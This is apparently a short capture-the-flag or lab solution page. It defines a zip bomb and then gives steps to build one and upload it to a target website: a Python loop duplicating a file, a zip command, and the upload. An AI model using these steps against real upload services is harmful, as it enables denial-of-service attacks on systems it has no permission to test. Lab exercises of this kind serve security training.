Zip Bomb

  • A zip bomb, also known as a zip of death or decompression bomb, is a malicious archive file designed to crash or render useless the program or system reading it

  • It is often employed to disable antivirus software, in order to create an opening for more traditional viruses

  • Rather than hijacking the normal operation of the program, a zip bomb allows the program to work as intended, but the archive is carefully crafted so that unpacking it (e.g. by a virus scanner in order to scan for viruses) requires inordinate amounts of time, disk space or memory

  • Most modern antivirus programs can detect whether a file is a zip bomb, to avoid unpacking it

Solution:

  • Create a large text file with a bunch of characters in it

    • I used null bytes (alt + 255)

  • Save the file in a folder

  • Write a python script to mass duplicate this file so that the total size of the folder is larger than 20MB

import shutil

for i in range(1300):

shutil.copy2('/root/Desktop/test/a.txt', '/root/Desktop/test/{}.txt'.format(i))

  • Create a zip file from this folder

zip -r test.zip test

  • Upload this zip file to the website

PreviousDatabase BackdoorsNextDenial of Service from Multiple Logins

Last updated